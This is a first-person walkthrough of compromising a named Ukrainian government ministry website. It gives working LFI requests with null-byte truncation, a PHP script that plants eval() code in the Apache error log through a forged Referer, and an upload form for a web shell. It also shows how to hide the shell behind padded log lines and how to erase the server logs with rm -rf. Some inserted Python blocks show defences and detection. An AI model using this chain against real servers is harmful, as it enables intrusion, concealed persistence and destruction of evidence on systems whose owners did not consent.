Lately I see more and more vulnerable government web sites, and the reason is banal: the sites are commissioned from non-professionals, or nobody moderates them and the support team does not read its mail. A security audit is treated as a luxury when in fact it is a necessity, and the site's users depend on it.
The purpose of this hack is not to profit from the uploaded shell. I want to show how vulnerable even the highest-level web sites can be. Protecting them ought to be task number one, because it is not hard to imagine what a compromised government site entails. What if I break into the LAN and reach the server that stores sensitive data, such as the results of the external independent testing (in the case of the MES web site)? Then the authenticity of the certificates that every institution of higher education requires could be called into question at any moment. Relax. I did not do that; I reported all the bugs I found to the site's support.
Picking out a victim
I don't know how it goes for you, but I find it easier to hunt for vulnerabilities with some good music on. I found Disturbed - Perfect Insanity in my playlist and opened mighty Google. Type in "міністерство" and you get no fewer than 15,400,000 results. Open the first link and you land on the web site of the Ministry of Education and Science of Ukraine.
The first thing that catches the eye is the "Official web site, 2004" inscription, yet all the news on the site was fresh. "Long time no update," I thought. With that in mind I hovered over the menu while watching the status bar. Every link looked like http://site/dir, so mod_rewrite was probably enabled. After clicking a link I found this address in the bar: http://www.mon.gov.ua/main.php?query=zno. I tried to disclose the path by changing the "query" parameter to "query[]", but that got me nowhere and no bug turned up, although the site's layout clearly broke. Either error reporting was simply turned off, or there was no vulnerability here. Still, I had a feeling one had to exist somewhere, so I checked for RFI, again with no result.
Since my scanner did not find a phpinfo() page, the path to the web root had to be found another way. First you have to make sure this really is a Local File Include and that the extension the script appends can be cut off with a null byte (PHP versions before 5.3.4 truncate the path at %00). I simply included the vulnerable script in itself:
http://www.mon.gov.ua/main.php?query=main.php%00
The page kept including itself endlessly, forming a pyramid. So the vulnerability exists, but we still cannot say whether it is a remote or a local include.
This is also an example of something more than an LFI: a looped DoS. A query like this can easily "drop" the site. I quickly stopped loading the page and began prepending "../" sequences to the query, the way you would walk up directories with cd. The path was picked up on the third attempt; I think you can work out how many "../" the query needed.
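To make the two tricks used above concrete, here is an added example (my code, not the article's) that models how the include path of a script like main.php is built when it does include($_GET['query'] . '.php') under a fixed web root on an old PHP build, and a hardened resolver that refuses the same inputs. The web root /var/www/html, the page-name rule and the function names are assumptions; the article never reveals them. In PHP the equivalent fix is an allow-list of page names (or at least realpath() plus a prefix check on the result).

```python
"""
Added example, not code from the original article: the include-path logic a
script like main.php?query=... exhibits, and a hardened replacement.
Assumptions: the include is include($_GET['query'] . '.php') below WEBROOT, and
the server ran a PHP build that truncates paths at a NUL byte (PHP < 5.3.4).
"""
import posixpath
import re
from urllib.parse import unquote

WEBROOT = "/var/www/html"   # assumed; the real web root is not on the page
PAGE_NAME = re.compile(r"^[A-Za-z0-9_-]+$")   # assumed shape of a legitimate page name


def vulnerable_include_path(query: str) -> str:
    """Model of the original behaviour: append '.php', then stop at the first
    NUL byte the way old PHP did. No check that the result stays under WEBROOT."""
    raw = unquote(query) + ".php"
    nul = raw.find("\x00")
    if nul != -1:
        raw = raw[:nul]          # %00 cuts the appended extension off
    # normpath collapses the ../ sequences, so three of them leave /var/www/html
    return posixpath.normpath(posixpath.join(WEBROOT, raw))


def safe_include_path(query: str) -> str:
    """Resolve a page name to a file under WEBROOT or raise ValueError."""
    name = unquote(query)
    if "\x00" in name:
        raise ValueError("NUL byte in page name")
    if not PAGE_NAME.match(name):
        raise ValueError("page name must be a plain identifier")
    path = posixpath.normpath(posixpath.join(WEBROOT, name + ".php"))
    # Belt and braces: whatever passed the regex must still resolve inside WEBROOT.
    if posixpath.commonpath([WEBROOT, path]) != WEBROOT:
        raise ValueError("resolved path escapes the web root")
    return path


def is_rejected(query: str) -> bool:
    """True when the hardened resolver refuses the query."""
    try:
        safe_include_path(query)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for q in ("zno", "main.php%00", "../../../proc/self/fd/2%00"):
        print(f"{q!r:35} vulnerable -> {vulnerable_include_path(q)}"
              f"  hardened -> {'rejected' if is_rejected(q) else safe_include_path(q)}")
```

The vulnerable model reproduces both observations from the text: "main.php%00" resolves to the script itself (the self-include loop), and three "../" followed by a null byte resolve to a path outside the web root with no ".php" appended.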
Forbidden: analyzing the situation
Uploading a shell became really easy once somebody smart enough worked out the trick with /proc/self/environ: send a request with a fake User-Agent, include that file, and that's it. So let's try:
http://www.mon.gov.ua/main.php?query=../../../proc/self/environ%00
Damn, nothing. But there are the Apache logs! /proc/self/fd/2 is the standard error stream of the process serving the request, and under Apache that is the error log. So:
main.php?query=../../../proc/self/fd/2%00
And what do we get?
[Sun Nov 15 07:41:42 2009] [error] [client 92.249.112.225] client denied by server configuration: /usr/share/phpMyAdmin/
[Sun Nov 15 08:43:31 2009] [error] [client 65.55.109.220] client denied by server configuration: /usr/share/phpMyAdmin/phpAdsNew, referer: http://xxxx.us/album/thumbnails.php?album=search&search=releases
The whole Apache log looks like this. You might think, "Hmm, that doesn't look like an access log", and you would be right: this is the error log, and it holds only "403 Forbidden" entries. The User-Agent is not written to this log, but the Referer is, and it can be faked just as easily as the User-Agent. The main thing is to find a page that reliably yields the cherished 403. The log makes it clear that phpMyAdmin is installed, and after confirming that http://www.mon.gov.ua/phpMyAdmin returns exactly that 403 we can make the server log any Referer we want. Let's write a simple PHP script that sends a forged Referer:
<?php
// Send one GET request to a path that answers 403, so that Apache writes the
// forged Referer, which carries our PHP code, into its error log.
$server = '212.111.193.189';
$dir = '/phpMyAdmin/';
$evilcode = '<?php eval($_REQUEST[ev]); ?>';
$header = "GET " .$dir. " HTTP/1.0\r\n";
$header .= "Host: " .$server. "\r\n";
$header .= "Referer: " .$evilcode. "\r\n";
$header .= "Connection: close\r\n\r\n";
$fp = fsockopen($server, 80, $errno, $errstr, 10);
if (!$fp) { die("[ X ] Connection failed: $errstr ($errno)"); }
echo "[ ~ ] Connection successful\r\n";
if (fputs($fp, $header) === false) { die("[ X ] Error while sending headers!"); }
echo "[ ~ ] Data sent!\r\n";
$result = fgets($fp, 128); // status line, e.g. "HTTP/1.1 403 Forbidden"
fclose($fp);
if (strpos($result, 'Forbidden') !== false) { echo "[ ~ ] Successful!\r\n"; } else { die("[ X ] Failed!"); }
?>
If you are too lazy to write the script, use an existing tool (e.g. InetCrack, HttpREQ by [x26] VOLAND, or any Firefox plug-in that lets you edit request headers).
Uploading the shell
Once the request is sent, it must be written to the log. Since we forged the Referer, the entry should look like this:
[Xxx Xxx xx xx:xx:xx 2009] [error] [client xx.xx.xx.xx] client denied by server configuration: /usr/share/phpMyAdmin/, referer: <?php eval($_REQUEST[ev]); ?>
Consequently our code is executed every time the log is loaded through the vulnerable script. Note that eval() expects PHP code, so the ev parameter has to carry a PHP statement. Let's check it in the browser:
http://www.mon.gov.ua/main.php?query=../../../proc/self/fd/2%00&ev=ls+la
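From the defender's side, both halves of this chain leave traces: the planted code sits in the error log's referer field, and the request that reads the log back carries traversal, /proc/self/ and a %00. Below is an added example (my code, not the article's) with detection logic for both, run over constructed Apache log lines; the IP addresses and entries are made up for the test and only their format follows the error_log lines quoted above.

```python
"""
Added example, not code from the original article: detect log poisoning via
the Referer header and the LFI request that triggers it. Sample log lines and
addresses below are constructed for this example.
"""
import re
from urllib.parse import unquote

# Apache 2.2-style error_log entry; the optional referer runs to end of line.
ERROR_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] "
    r"(?P<msg>.*?)(?:, referer: (?P<referer>.*))?$"
)
# Combined-format access_log line up to and including the request.
ACCESS_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Things that never belong in a Referer: PHP tags, eval-style sinks, superglobals.
SUSPICIOUS_REFERER = re.compile(
    r"<\?(php)?|\b(eval|assert|system|passthru|shell_exec|base64_decode)\s*\(|"
    r"\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)
# Request targets that read a log or /proc file through an include: repeated
# traversal, /proc/self/, or an embedded NUL byte that cuts off the extension.
LFI_TARGET = re.compile(r"(\.\./){2,}|/proc/self/|\x00")

SAMPLE_ERROR_LOG = [   # constructed
    "[Sun Nov 15 07:41:42 2009] [error] [client 203.0.113.5] client denied by "
    "server configuration: /usr/share/phpMyAdmin/",
    "[Sun Nov 15 08:43:31 2009] [error] [client 203.0.113.6] client denied by "
    "server configuration: /usr/share/phpMyAdmin/phpAdsNew, referer: "
    "http://example.net/album/thumbnails.php?album=search",
    "[Sun Nov 15 09:02:10 2009] [error] [client 198.51.100.7] client denied by "
    "server configuration: /usr/share/phpMyAdmin/, referer: <?php eval($_REQUEST[ev]); ?>",
]
SAMPLE_ACCESS_LOG = [   # constructed
    '203.0.113.8 - - [15/Nov/2009:09:02:50 +0200] "GET /main.php?query=zno HTTP/1.1" 200 8192',
    '198.51.100.7 - - [15/Nov/2009:09:03:01 +0200] "GET /main.php?query=../../../proc/self/fd/2'
    '%00&ev=system(%27ls%27); HTTP/1.1" 200 512',
]


def find_poisoned_referers(lines):
    """Error-log entries whose referer carries code rather than a URL."""
    hits = []
    for line in lines:
        m = ERROR_LINE.match(line)
        if not m or not m.group("referer"):
            continue
        if SUSPICIOUS_REFERER.search(m.group("referer")):
            hits.append({"client": m.group("client"), "referer": m.group("referer")})
    return hits


def find_lfi_requests(lines):
    """Access-log requests that try to include a log or /proc file."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        target = unquote(m.group("target"))   # %00 becomes a real NUL byte here
        if LFI_TARGET.search(target):
            hits.append({"client": m.group("client"), "target": target})
    return hits


def poisoning_chains(error_lines, access_lines):
    """Clients seen planting code in the error log AND reading a log-like file
    back through the include: the complete chain from the write-up."""
    planters = {h["client"] for h in find_poisoned_referers(error_lines)}
    readers = {h["client"] for h in find_lfi_requests(access_lines)}
    return planters & readers


if __name__ == "__main__":
    print("poisoned referers:", find_poisoned_referers(SAMPLE_ERROR_LOG))
    print("LFI requests:     ", find_lfi_requests(SAMPLE_ACCESS_LOG))
    print("full chains from: ", poisoning_chains(SAMPLE_ERROR_LOG, SAMPLE_ACCESS_LOG))
```

The request decoding matters: the %00 only becomes visible as a NUL after unquoting, and a pattern that looks for the literal "%00" misses the encoded-twice and mixed-case variants that a WAF-evading attacker would send.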
It worked: we can see the directory listing. I tried fetching the shell onto the server with the usual tools (wget, GET, links, lynx), but every attempt failed. So I resorted to an HTML form that uploads the file through the same eval(): copy() moves the uploaded temporary file to the name passed in aa.
<form action="http://www.mon.gov.ua/main.php?query=../../../proc/self/fd/2%00&ev=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=./mon.php" method="post" enctype="multipart/form-data">
<input type="file" name="file"><br>
<input type="submit" value="Upload"><br>
</form>
Now I simply upload the shell from my computer, open its page and enter the password (do not forget to set unique passwords on your shells). Looking through the file list I saw two empty files, "error.php" and "error". A wonderful opportunity to hide the shell: I take the same error log and paste it at the beginning of the file. Now it looks roughly like this:
<?php /*
[Mon Nov 16 11:14:07 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:08 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:14 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:15 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:18 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
...
*/
(many blank lines here, so that the code sits far below the top of the file)
?>
<?php
// Authentication
$login = ""; // Login
$pass = "";  // Pass
... ?>
I hardly need to explain that the log line should be repeated many times. This trick is used often, so keep it in mind when you are hunting for somebody else's shell. The beginning of the file can also be padded with the CMS copyright or license text: usually, once an admin sees the GNU license header, he closes the file without looking further, which is exactly what we need.
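The padding trick only works against a reviewer who reads the top of the file. A scanner that strips comments first sees straight through it, and it also avoids the opposite mistake of flagging a plain copy of a poisoned log. Below is an added example (my code, not the article's) with such a scanner; the three sample files are constructed here, and the function names and the list of sink functions are my own choices.

```python
"""
Added example, not code from the original article: triage a PHP file that may be
a disguised shell (log lines or license text in a leading comment, a long run of
blank lines, then real code). Sample files are constructed below.
"""
import re

# Remove /* */ blocks and //, # line comments while keeping newlines, so line
# numbers reported later still refer to the original file. Heuristic: strings
# are not tokenised, so a "//" inside a string literal is cut too.
PHP_COMMENT = re.compile(r"/\*.*?\*/|//[^\n]*|#[^\n]*", re.DOTALL)
DANGEROUS_CALL = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|"
    r"base64_decode|gzinflate|str_rot13)\s*\(",
    re.IGNORECASE,
)
USER_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|FILES|SERVER)\b")

LOG_LINE = ("[Mon Nov 16 11:14:07 2009] [error] [client ::1] client denied by "
            "server configuration: /usr/share/phpMyAdmin/")

# 1. The disguised shell: 50 log lines in a comment, 200 blank lines, then code.
DISGUISED_SHELL = (
    "<?php /*\n" + "\n".join([LOG_LINE] * 50) + "\n*/" + "\n" * 200
    + "?>\n<?php\n$login = \"\";\n$pass = \"\";\n"
    "if ($_POST['pass'] === $pass) { echo shell_exec($_POST['cmd']); }\n?>\n"
)
# 2. A clean file with a GPL header: license text alone must not trigger.
BENIGN_FILE = (
    "<?php\n/*\n * This program is free software; you can redistribute it and/or\n"
    " * modify it under the terms of the GNU General Public License.\n */\n"
    "function render($page) { return htmlspecialchars($page); }\n?>\n"
)
# 3. A poisoned error-log line pasted into a comment: the dangerous text is
#    present, but it is not code, so it must not trigger either.
QUOTED_LOG = "<?php /* " + LOG_LINE + ", referer: <?php eval($_REQUEST[ev]); */ ?>\n"


def strip_comments(src: str) -> str:
    """Blank out comments but keep every newline they contained."""
    return PHP_COMMENT.sub(lambda m: "\n" * m.group(0).count("\n"), src)


def scan_php(src: str) -> dict:
    """Report sink calls and superglobal use found outside comments."""
    code = strip_comments(src)
    matches = list(DANGEROUS_CALL.finditer(code))
    calls = sorted({m.group(1).lower() for m in matches})
    uses_input = bool(USER_INPUT.search(code))
    first_line = code[: matches[0].start()].count("\n") + 1 if matches else None
    return {
        "dangerous_calls": calls,
        "uses_user_input": uses_input,
        "first_call_line": first_line,      # how deep the real code is buried
        "total_lines": src.count("\n") + 1,
        "verdict": bool(calls) and uses_input,
    }


if __name__ == "__main__":
    for name, src in (("disguised", DISGUISED_SHELL), ("benign", BENIGN_FILE),
                      ("quoted log", QUOTED_LOG)):
        print(f"{name:11}", scan_php(src))
```

The verdict requires both a sink call and user input reaching the file, which is what a shell needs; a file that merely quotes "eval(" inside a comment, like the poisoned log itself, is reported with an empty call list.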
Don't forget to remove the log files. Thank God I had the rights for that, and I ran "rm -rf /var/log/httpd/".
Conclusion
Hacking web sites is illegal and punishable by law, so I recommend you don't. If you still decide to hack a site, be a "white hat" and smart about it, and inform the administrator of the vulnerabilities you found in his system (as I did right away).
WARNING
The information is presented strictly for educational purposes! Neither the author nor the editors are responsible for any actions you may undertake!